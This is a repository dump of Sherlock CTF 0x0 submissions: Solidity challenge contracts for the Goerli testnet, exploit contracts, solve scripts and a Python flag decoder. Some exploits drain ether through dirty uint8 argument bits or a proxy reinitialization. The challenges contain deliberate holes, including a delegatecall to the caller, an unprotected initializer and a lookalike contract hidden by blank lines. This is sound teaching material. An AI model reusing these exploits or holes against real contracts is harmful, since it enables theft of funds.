require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const setup = await ethers.getContractAt("Setup", 
"0x0a73CA730FaF56126487196a4B7E10B2A9B3df67"); 10 | const ctf = await ethers.getContractAt("SwissTreasury", "0x014D1921A1237b6e8fF3FA960333329667F7e242"); 11 | 12 | console.log("Deployed setup to", setup.address); 13 | console.log("Deployed ctf to", ctf.address); 14 | 15 | // verify 16 | await hre.run("verify:verify", { 17 | address: ctf.address, 18 | }); 19 | await hre.run("verify:verify", { 20 | address: setup.address, 21 | }); 22 | 23 | } 24 | 25 | main() 26 | .then(() => process.exit(0)) 27 | .catch((error) => { 28 | console.error(error); 29 | process.exit(1); 30 | }); 31 | -------------------------------------------------------------------------------- /chaboo/scripts/hardhat/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | // const hre = require("hardhat"); 3 | 4 | // function sleep(seconds) { 5 | // return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | // } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("SwissTreasury", await setup.instance()); 15 | 16 | console.log("Deployed setup to", setup.address); 17 | console.log("Deployed ctf to", ctf.address); 18 | 19 | // wait for etherscan to index 20 | // await sleep(300); 21 | 22 | // verify 23 | // await hre.run("verify:verify", { 24 | // address: setup.address, 25 | // }); 26 | // await hre.run("verify:verify", { 27 | // address: ctf.address, 28 | // }); 29 | } 30 | 31 | main() 32 | .then(() => process.exit(0)) 33 | .catch((error) => { 34 | console.error(error); 35 | process.exit(1); 36 | }); 37 | -------------------------------------------------------------------------------- /chaboo/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { 
parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | const setup = await SETUP.deploy({ value: parseEther("1") }); 7 | const ctf = await ethers.getContractAt("SwissTreasury", await setup.instance()); 8 | 9 | console.log("solved:", await setup.isSolved()); 10 | const exploit = await EXPLOIT.deploy(ctf.address); 11 | await exploit.finalize(); 12 | console.log("solved:", await setup.isSolved()); 13 | } 14 | 15 | main() 16 | .then(() => process.exit(0)) 17 | .catch((error) => { 18 | console.error(error); 19 | process.exit(1); 20 | }); 21 | -------------------------------------------------------------------------------- /ebaizel/.gitignore: -------------------------------------------------------------------------------- 1 | ETHERSCAN_API= 2 | ALCHEMY_API_KEY_GOERLI= 3 | PRIVATE_KEY= 4 | # NOTE(review): the three entries above are .env-style variable names, not ignore patterns; nothing here ignores `.env`, so a filled-in .env (including PRIVATE_KEY) would not be kept out of commits by this file. -------------------------------------------------------------------------------- /ebaizel/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-ebaizel 2 | 3 | Goerli contract addresses: 4 | 5 | Setup 0x5364b5a9e489b495caae4722e9706c817cf54433 6 | PixelPavel 0x784b7a7a25ed38ef830aefe7985c64f3adf08346 -------------------------------------------------------------------------------- /ebaizel/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.6; 2 | 3 | contract Exploit { 4 | 5 | address pixelPavelContract; 6 | 7 | constructor(address _pixelPavelContract) { 8 | pixelPavelContract = _pixelPavelContract; 9 | } 10 | 11 | function finalize() external { 12 | /* We need to pass in 42 as a parameter to get past the first 'require'. 13 | However, we also need to pass in a value of 298 to pass the second check. 14 | 15 | So how do we do that? Dirty higher order bits. 
16 | 17 | The parameter is a uint8 but every function parameter is always 32 bytes. 18 | So we exploit this by sneaking in some other values in the bytes that will be 19 | ignored by the function parameter. 20 | 21 | So what we need to do is pass in the value 298, which is represented in hex as `12a`, 22 | which will cleanly map to a hex uint8 value of '2a', which allows us to pass 23 | the first require. 24 | 25 | To pass the second require, we simply just need to make sure the bytes comparison 26 | matches, which it will do if we pass in the value 298. 27 | 28 | Note, this only works in pre Solidity 0.8. Since then the runtime will revert 29 | in the event of dirty higher order bits. 30 | 31 | */ 32 | bytes memory data = abi.encodeWithSignature("crackCode(uint8)", 298); 33 | (bool success, bytes memory returnData) = pixelPavelContract.call(data); 34 | require(success, "Finalize failed"); 35 | } 36 | } -------------------------------------------------------------------------------- /ebaizel/contracts/PixelPavel.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.6; 2 | 3 | /* 4 | The nefarious Pixel Pavel has struck again! This time exploiting a DeFi 5 | protocol and draining 298 Wei. Interpol does not know his whereabouts but 6 | they have identified this contract as where he is keeping his funds. 7 | 8 | After scouring StackOverflow and many Discord channels, they were still 9 | unable to crack the code and retrieve the funds. So, now they have 10 | reached out to you, Esther Von Munchen, as their last hope to retrieve 11 | the funds. 12 | 13 | Be sharp, be patient, and those 298 Wei will return to their rightful owner. 14 | 15 | Good luck! 
/// @title PixelPavel
/// @notice CTF target: holds 298 wei and pays out its whole balance when `crackCode`
///         receives calldata that passes both checks below.
/// @dev The two checks read different views of the same argument word: `_smallAnswer`
///      is the uint8 view, `data` is the raw 32-byte word. The accompanying Exploit.sol
///      notes that this only works before Solidity 0.8, where out-of-range ("dirty")
///      upper bits in a uint8 argument are not rejected.
contract PixelPavel {
    // Value the decoded uint8 argument must equal.
    uint8 constant public smallPrizeAnswer = 42;
    // Value the raw argument word must equal; also the funding required at deployment (wei).
    uint256 constant public bigPrizeWinningAnswer = 298;

    /// @notice Funds the contract; deployment reverts unless exactly 298 wei is attached.
    constructor() payable {
        require(msg.value == bigPrizeWinningAnswer, "Gotta pay to play, 298 Wei.");
    }

    /// @notice Checks the answer and, if the raw calldata word also equals 298, sends the
    ///         contract's balance to `tx.origin`.
    /// @param _smallAnswer Must equal 42 after decoding as uint8.
    function crackCode(uint8 _smallAnswer) external {
        require(_smallAnswer == smallPrizeAnswer, "Answer must equal 42.");

        // Well done! You won the small prize. Now let's try for the big kahuna.
        // Left-pad msg.data with 28 zero bytes so the 4-byte selector fills the first
        // 32-byte word (`sig`, never used) and the first argument word becomes `data`.
        (bytes32 sig, bytes32 data) = abi.decode(
            abi.encodePacked(bytes28(0), msg.data),
            (bytes32,bytes32)
        );

        // Compares the full 32-byte word with 298, not the uint8 value checked above.
        if (keccak256(abi.encode(bigPrizeWinningAnswer)) == keccak256(abi.encode(data))) {
            uint amount = address(this).balance;
            // Pays the externally owned account that originated the transaction,
            // not msg.sender; an intermediate contract caller receives nothing.
            (bool success, ) = payable(tx.origin).call{value: amount}("");
            require(success, "Failed to send Ether");
        }
    }
}
/// @notice Transformation that was used to produce `encFlag`; `solveIt` hashes its output
///         and compares it with the hash of that constant.
/// @dev When a particular string is passed, the output is `encFlag`; reverse `encFlag`
///      to the input string to solve the CTF. No key is involved and each step below is
///      invertible, so this is an encoding rather than encryption: publishing `encFlag`
///      does not keep the input secret.
/// @param stringFlag Candidate flag.
/// @return The transformed bytes, same length as the input.
function encryptFlag(string memory stringFlag)
    public
    pure
    returns (bytes memory)
{
    bytes memory flag = bytes(stringFlag);
    for (uint256 i; i < flag.length; i++) {
        // Chain with the previous byte, which was already transformed by the previous iteration.
        if (i > 0) flag[i] ^= flag[i - 1];
        // Four shift-XOR steps, applied in the order 4, 3, 2, 1.
        flag[i] ^= flag[i] >> 4;
        flag[i] ^= flag[i] >> 3;
        flag[i] ^= flag[i] >> 2;
        flag[i] ^= flag[i] >> 1;
    }

    return flag;
}
# Hex string copied from BitMania.encFlag.
tr = "6e3c5b0f722c430e6d324c0d6f67173d4b1565345915753504211f"
b = 0
decoded = ""


def gray2binary(x, s):
    """Undo one `x ^= x >> s` step (the form used by BitMania.encryptFlag).

    The shift amount is doubled on every round and the loop stops as soon as
    the shifted value is zero.
    """
    shift = s
    while True:
        carry = x >> shift
        if not carry:
            break
        x ^= carry
        shift *= 2
    return x


for offset in range(0, len(tr) - 1, 2):
    # Current transformed byte.
    value = int(tr[offset:offset + 2], 16)
    # Previous transformed byte; stays 0 for the first position.
    if offset > 0:
        b = int(tr[offset - 2:offset], 16)

    # encryptFlag applied the shifts in the order 4, 3, 2, 1, so they are
    # undone in the order 1, 2, 3, 4.
    for step in (1, 2, 3, 4):
        value = gray2binary(value, step)

    # Remove the chaining with the previous byte, then keep the character.
    decoded += chr(value ^ b)

print(decoded)
// Accounts Hardhat may sign Goerli transactions with. PRIVATE_KEY is read from
// the environment (dotenv loads it from `.env`, which the project's .gitignore
// excludes); when it is unset the list is empty instead of holding "".
const goerliAccounts = PRIVATE_KEY === "" ? [] : [PRIVATE_KEY];

// Hardhat reads its configuration from the exported object.
// See https://hardhat.org/config/ for the available options.

/**
 * @type import('hardhat/config').HardhatUserConfig
 */
module.exports = {
  solidity: "0.8.4",
  etherscan: {
    // Etherscan API key, used by the verify task (https://etherscan.io/).
    apiKey: ETHERSCAN_API,
  },
  networks: {
    goerli: {
      url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`,
      // Fixed gas price in wei (900 gwei).
      gasPrice: 900000000000,
      accounts: goerliAccounts,
    },
  },
};
| 13 | const ctf = await ethers.getContractAt( 14 | "BitMania", 15 | await setup.instance() 16 | ); 17 | 18 | console.log("Deployed setup to", setup.address); 19 | console.log("Deployed ctf to", ctf.address); 20 | 21 | // wait for etherscan to index 22 | await sleep(300); 23 | 24 | // verify 25 | await hre.run("verify:verify", { 26 | address: setup.address, 27 | }); 28 | await hre.run("verify:verify", { 29 | address: ctf.address, 30 | }); 31 | } 32 | 33 | main() 34 | .then(() => process.exit(0)) 35 | .catch((error) => { 36 | console.error(error); 37 | process.exit(1); 38 | }); 39 | -------------------------------------------------------------------------------- /iflp/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /iflp/README.md: -------------------------------------------------------------------------------- 1 | # Example CTF submission 2 | 3 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 
/// @title ExampleQuizExploit
/// @notice CTF target: holds the ether it was deployed with and sends its whole balance
///         to a caller whose guess matches the number returned by `rng`.
/// @dev The `Lollercoaster` type used here is the one declared earlier in this file,
///      whose `randInt` takes a `uint256`.
///      NOTE(review): contracts/Lollercoaster.sol declares `randInt(uint32)`, which has a
///      different function selector — confirm which contract is actually passed to
///      `initialize`.
contract ExampleQuizExploit {
    // Number source consulted by `guess`; set once by `initialize`.
    Lollercoaster private rng;
    bool private initialized = false;

    /// @notice Accepts the ether attached at deployment; performs no other setup.
    constructor() payable {}

    /// @notice One-time setter for the number source.
    /// @dev There is no caller restriction: the only guard is the `initialized` flag, so
    ///      whichever account calls first chooses the contract that `guess` will trust.
    /// @param lollercoaster Address stored as `rng`.
    function initialize(address lollercoaster) external {
        require(initialized == false, "Already initialized");
        rng = Lollercoaster(lollercoaster);
        // Hardhat console debug output.
        console.log("ADDR", address(rng));
        initialized = true;
        // Debug output that also makes an external call to `rng`.
        console.log("asdadasd", rng.randInt(1000000));
    }

    /// @notice Pays out the whole balance when `n` equals `rng.randInt(1000000)`.
    /// @dev Requires exactly 1 ether per call; the ether stays in the contract on a wrong
    ///      guess. The balance sent on a match includes the 1 ether just paid.
    /// @param n The caller's guess.
    function guess(uint256 n) external payable {
        require(msg.value == 1 ether);

        if (n == rng.randInt(1000000)) {
            // Send all ether to user
            (bool success, ) = msg.sender.call{value: address(this).balance}(
                ""
            );
            require(success, "send fail");
        }
    }
}
/// @title Lollercoaster
/// @notice Returns a fixed stored number modulo the argument; despite the name `randInt`,
///         no block, caller or other varying input is used.
/// @dev This is the second contract in Lollercoaster.sol. The first one, `LolIercoaster`
///      (capital "I" in place of the second lowercase "l"), sits at the top of the file
///      and is followed by dozens of blank lines, so a reader who stops at the first
///      screen sees only the lookalike. When reviewing verified source, search the whole
///      file and compare contract names character by character.
contract Lollercoaster {
    // Public state variable: its value is readable through the generated getter.
    uint256 public var620495566;

    constructor() {
        var620495566 = 1011337101;
    }

    /// @notice Returns `var620495566 % n`.
    /// @dev The parameter is `uint32`, unlike the `uint256` used by `LolIercoaster.randInt`
    ///      above; the two signatures therefore have different selectors.
    ///      Reverts when `n` is 0 (modulo by zero).
    /// @param n Modulus.
    function randInt(uint32 n) external view returns (uint256) {
        return var620495566 % n;
    }
}
"./ExampleQuizExploit.sol"; 5 | 6 | contract Setup is ISetup { 7 | ExampleQuizExploit public instance; 8 | Lollercoaster public rng; 9 | bool private isInitialized = false; 10 | 11 | constructor() payable { 12 | require(msg.value == 1 ether); 13 | instance = new ExampleQuizExploit{value: 1 ether}(); 14 | emit Deployed(address(instance)); 15 | } 16 | 17 | function isSolved() external view override returns (bool) { 18 | return address(instance).balance == 0; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /iflp/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require('@nomiclabs/hardhat-waffle'); 2 | require('@nomiclabs/hardhat-etherscan'); 3 | require('dotenv').config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ''; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ''; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ''; 8 | 9 | // This is a sample Hardhat task. 
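/**
 * Deploys Lollercoaster and Setup (funded with 1 ether) to the configured
 * network, wires the Lollercoaster address into the CTF contract, waits for
 * Etherscan to index the deployments and then verifies all three contracts.
 *
 * Relies on the `ethers` global that Hardhat injects when the script is run
 * through `hardhat run`.
 */
async function main() {
  const LOLLERCOASTER = await ethers.getContractFactory(
    'contracts/Lollercoaster.sol:Lollercoaster'
  );
  const lollercoaster = await LOLLERCOASTER.deploy();
  // deploy() resolves when the transaction is sent; wait until it is mined so
  // the address logged below refers to an existing contract.
  await lollercoaster.deployed();
  console.log('Deployed lollercoaster to', lollercoaster.address);

  const SETUP = await ethers.getContractFactory('Setup');
  const setup = await SETUP.deploy({ value: parseEther('1') });
  await setup.deployed();
  const ctf = await ethers.getContractAt('ExampleQuizExploit', await setup.instance());

  // ExampleQuizExploit.initialize() has no caller restriction, so the contract
  // stays open to any caller until this transaction is mined. Wait for the
  // receipt so a revert (e.g. "Already initialized") fails the script here
  // instead of going unnoticed.
  const initTx = await ctf.initialize(lollercoaster.address);
  await initTx.wait();

  console.log('Deployed setup to', setup.address);
  console.log('Deployed ctf to', ctf.address);

  // wait for etherscan to index
  await sleep(300);

  // verify
  await hre.run('verify:verify', {
    address: lollercoaster.address,
  });
  await hre.run('verify:verify', {
    address: setup.address,
  });
  await hre.run('verify:verify', {
    address: ctf.address,
  });
}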
/// @title Challenge
/// @notice CTF target: holds the ether it was deployed with; a correct guess makes it
///         delegatecall back into the caller.
contract Challenge {
    // Private number, will not be public at all ;)
    // `private` only blocks access from other contracts' code; a constant is part of the
    // deployed bytecode and of the verified source, so the value is not secret.
    uint8 private constant answer = 42;

    /// @notice Accepts the ether attached at deployment.
    constructor() payable {}

    /// @notice Takes a 100 wei fee and, when `n` equals `answer`, delegatecalls the caller
    ///         with empty calldata.
    /// @dev `delegatecall` runs the caller's code (its fallback, given the empty calldata)
    ///      in this contract's context, so that code acts on this contract's balance and
    ///      storage. No ether is transferred by the call itself, despite the 'send fail'
    ///      message. Delegatecalling an address chosen by the caller hands that caller
    ///      full control of the contract.
    /// @param n The caller's guess.
    function guess(uint8 n) external payable {
        require(msg.value == 100 wei);

        if (n == answer) {
            (bool success, ) = msg.sender.delegatecall('');
            require(success, 'send fail');
        }
    }
}
/// @title Setup
/// @notice Deploys and funds the Challenge instance and reports whether it has been solved.
contract Setup is ISetup {
    // The deployed challenge; its address is also announced through `Deployed`.
    Challenge public instance;

    /// @notice Requires exactly 100 wei and forwards all of it to a new Challenge.
    constructor() payable {
        require(msg.value == 100 wei);

        instance = new Challenge{value: 100 wei}();
        emit Deployed(address(instance));
    }

    /// @notice The challenge counts as solved once the Challenge contract holds no ether.
    /// @return True when the instance's balance is zero.
    function isSolved() external override view returns (bool) {
        return address(instance).balance == 0;
    }
}
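/**
 * Deploys Setup (funded with 0.1 ether) to the configured network, waits for
 * Etherscan to index the deployment and then verifies Setup and the challenge
 * contract it created.
 *
 * Relies on the `ethers` global that Hardhat injects when the script is run
 * through `hardhat run`.
 */
async function main() {
  const SETUP = await ethers.getContractFactory("Setup");

  const setup = await SETUP.deploy({ value: parseEther("0.1") });
  await setup.deployed();

  // Setup.sol declares `Dead public instance`, so attach with the Dead
  // artifact. The previous name, "ExampleQuizExploit", is not a contract this
  // project's Setup.sol refers to and looks like a leftover from the template.
  const ctf = await ethers.getContractAt("Dead", await setup.instance());

  console.log("Deployed setup to", setup.address);
  console.log("Deployed ctf to", ctf.address);

  // wait for etherscan to index
  await sleep(300);

  // verify
  await hre.run("verify:verify", {
    address: setup.address,
  });
  await hre.run("verify:verify", {
    address: ctf.address,
  });
}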
7 | 8 | | Contract | Goerli | 9 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 10 | | Challenge.sol | [0x7DC33b58B3258a745C0ADbfC46d8A4B543254f24](https://goerli.etherscan.io/address/0x7DC33b58B3258a745C0ADbfC46d8A4B543254f24) | 11 | | Setup.sol | [0x0ABBC49482097b530516d385B4dD183b59073f1C](https://goerli.etherscan.io/address/0x0ABBC49482097b530516d385B4dD183b59073f1C) | 12 | 13 | -------------------------------------------------------------------------------- /kuldeep23907/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import "./Challenge.sol"; 5 | 6 | contract Exploit { 7 | Challenge instance; 8 | 9 | constructor(Challenge _instance) { 10 | instance = _instance; 11 | 12 | Slogan2 s2 = new Slogan2(); 13 | 14 | SloganProxy sp = SloganProxy(payable(instance.sloganContract())); 15 | 16 | // make slogan2 contract as new implementation of SloganProxy 17 | instance.callSloganContract( 18 | abi.encodeWithSelector(sp.initialize.selector, address(s2), "") 19 | ); 20 | 21 | // call the getAllEther to withdraw all ETH from Challenge.sol 22 | instance.callSloganContract( 23 | abi.encodeWithSelector(s2.getAllEther.selector) 24 | ); 25 | } 26 | } 27 | 28 | contract Slogan2 { 29 | function getAllEther() public { 30 | (bool success, ) = (msg.sender).call{value: address(this).balance}(""); 31 | require(success, "failed"); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /kuldeep23907/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | 
/// @title Setup
/// @notice Deploys the Slogan implementation, its proxy and the funded Challenge, and
///         reports whether the challenge has been solved.
contract Setup is ISetup {
    // The deployed challenge; its address is also announced through `Deployed`.
    Challenge public instance;

    /// @notice Requires exactly 1 ether and forwards all of it to the new Challenge.
    /// @dev The proxy is initialized with the Slogan address and empty data before its
    ///      address is handed to the Challenge constructor.
    constructor() payable {
        require(msg.value == 1 ether);
        Slogan slogan = new Slogan();
        SloganProxy sloganProxy = new SloganProxy();
        sloganProxy.initialize(address(slogan), "");
        instance = new Challenge{value: 1 ether}(address(sloganProxy));
        emit Deployed(address(instance));
    }

    /// @notice The challenge counts as solved once the Challenge contract holds no ether.
    /// @return True when the instance's balance is zero.
    function isSolved() external view override returns (bool) {
        return address(instance).balance == 0;
    }
}
To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | hardhat: {}, 34 | goerli: { 35 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 36 | gasPrice: 900000000000, 37 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 38 | }, 39 | }, 40 | }; 41 | -------------------------------------------------------------------------------- /kuldeep23907/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sherlock-ctf-0x0-kuldeep23907", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "repository": { 10 | "type": "git", 11 | "url": "git+https://github.com/sherlock-protocol/sherlock-ctf-0x0-kuldeep23907.git" 12 | }, 13 | "author": "", 14 | "license": "ISC", 15 | "bugs": { 16 | "url": "https://github.com/sherlock-protocol/sherlock-ctf-0x0-kuldeep23907/issues" 17 | }, 18 | "homepage": "https://github.com/sherlock-protocol/sherlock-ctf-0x0-kuldeep23907#readme", 19 | "devDependencies": { 20 | "@nomiclabs/hardhat-ethers": "^2.0.4", 21 | "@nomiclabs/hardhat-waffle": "^2.0.2", 22 | "chai": "^4.3.6", 23 | "ethereum-waffle": "^3.4.0", 24 | "ethers": "^5.5.3", 25 | "hardhat": "^2.8.3" 26 | }, 27 | "dependencies": { 28 | 
"@nomiclabs/hardhat-etherscan": "^3.0.0", 29 | "@openzeppelin/contracts": "^4.5.0", 30 | "dotenv": "^14.3.2" 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /kuldeep23907/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("Challenge", await setup.instance()); 15 | const sloganContract = await ctf.sloganContract(); 16 | console.log("Deployed ctf to", ctf.address); 17 | 18 | // wait for etherscan to index 19 | await sleep(300); 20 | 21 | // verify 22 | await hre.run("verify:verify", { 23 | address: setup.address, 24 | }); 25 | await hre.run("verify:verify", { 26 | address: ctf.address, 27 | constructorArguments: [sloganContract], 28 | }); 29 | } 30 | 31 | main() 32 | .then(() => process.exit(0)) 33 | .catch((error) => { 34 | console.error(error); 35 | process.exit(1); 36 | }); 37 | -------------------------------------------------------------------------------- /kuldeep23907/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("1") }); 8 | const ctf = await ethers.getContractAt("Challenge", await setup.instance()); 9 | 10 | console.log("solved:", await setup.isSolved()); 11 | 12 | const exp = await 
EXPLOIT.deploy(ctf.address); 13 | 14 | console.log("solved:", await setup.isSolved()); 15 | } 16 | 17 | main() 18 | .then(() => process.exit(0)) 19 | .catch((error) => { 20 | console.error(error); 21 | process.exit(1); 22 | }); 23 | -------------------------------------------------------------------------------- /lucyoa/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /lucyoa/README.md: -------------------------------------------------------------------------------- 1 | # Sherlock Challenge 2 | 3 | | Contract | Goerli | 4 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | Challenge.sol | [0x4C9bf01acEA21DDC7Ca25d49d301B8bDd63c1966](https://goerli.etherscan.io/address/0x4C9bf01acEA21DDC7Ca25d49d301B8bDd63c1966) | 6 | | Setup.sol | [0xe95dF719Fc223CD8E57bA9bAAb8E86bEDF3e5d69](https://goerli.etherscan.io/address/0xe95dF719Fc223CD8E57bA9bAAb8E86bEDF3e5d69) | 7 | 8 | -------------------------------------------------------------------------------- /lucyoa/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.0; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /lucyoa/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.0; 2 | 3 | import "./ISetup.sol"; 4 | import "./Challenge.sol"; 5 | 6 | 7 | contract Setup is ISetup { 8 | Challenge public instance; 9 | 10 | constructor() payable { 11 | instance = new 
Challenge(); 12 | 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | address govToken = instance.govTokens(0); 18 | return GovToken(govToken).balanceOf(address(instance)) == 0; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /lucyoa/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | /* Secrets are read from the environment (dotenv loads .env above); each falls back to "" when unset, so nothing sensitive is hard-coded here. */ const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | 10 | module.exports = { 11 | solidity: "0.8.0", 12 | etherscan: { 13 | apiKey: ETHERSCAN_API, 14 | }, 15 | networks: { 16 | goerli: { 17 | /* The Alchemy key is embedded in the RPC URL, so the full URL has to be treated as a secret as well. */ url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 18 | gasPrice: 900000000000, 19 | /* The filter drops the empty fallback, so the goerli network gets an empty account list when PRIVATE_KEY is unset. */ accounts: [PRIVATE_KEY].filter((item) => item !== ""), 20 | }, 21 | }, 22 | }; 23 | -------------------------------------------------------------------------------- /lucyoa/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.5", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.4", 9 | "hardhat": "^2.8.4" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.1", 13 | "@openzeppelin/contracts": "^4.0.0", 14 | "@openzeppelin/test-helpers": "^0.5.15", 15 | "dotenv": "^16.0.0", 16 | "openzeppelin-test-helpers": "^0.5.1" 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /luksgrin/README.md: -------------------------------------------------------------------------------- 1 | # CTF Submission: 
Haunted Dungeon 2 | 3 | Welcome to the **Haunted Dungeon**. 4 | Will you be able to conquer its treasure or will you perish? 5 | 6 | The Haunted Dungeon is a "turn-based" RPG with 5 floors. The 6th floor is the treasure room. 7 | There is a store with power up items and each floor is guarded by a monster. 8 | There's a limited number of times one can enter the store in a floor. 9 | The monster's health and attack are pseudo-random. 10 | Pay close attention to the contract's log, since it displays in-game messages. 11 | 12 | Some items purely increase your stats while others may increase some stats while decreasing others... 13 | 14 | The CTF is deemed as completed once you conquer all floors and claim the treasure! 15 | 16 | Have fun! 17 | 18 | 19 | | Contract | Goerli | 20 | |--------------------| ---------------------------------------------------------------------------------------------------------------------------- | 21 | | HauntedDungeon.sol | [0x137A5B4bB53A62BD1Db46e563b89D1884afaC0Ac](https://goerli.etherscan.io/address/0x137A5B4bB53A62BD1Db46e563b89D1884afaC0Ac) | 22 | | Setup.sol | [0x9bdcf71048dfd8ef1c03a7ae3ede79f04a096b7f](https://goerli.etherscan.io/address/0x9bdcf71048dfd8ef1c03a7ae3ede79f04a096b7f) | 23 | 24 | `.env` file 25 | 26 | ``` 27 | ETHERSCAN_API= 28 | ALCHEMY_API_KEY_GOERLI= 29 | PRIVATE_KEY= 30 | ``` 31 | -------------------------------------------------------------------------------- /luksgrin/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /luksgrin/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './HauntedDungeon.sol'; 5 | 
